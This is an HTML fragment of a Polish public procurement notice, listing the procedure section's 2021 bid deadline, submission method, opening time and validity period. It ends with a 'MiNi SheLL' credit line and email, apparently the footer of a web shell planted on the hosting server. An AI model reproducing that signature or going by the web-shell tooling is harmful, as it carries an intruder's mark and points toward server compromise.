innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektronicznie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com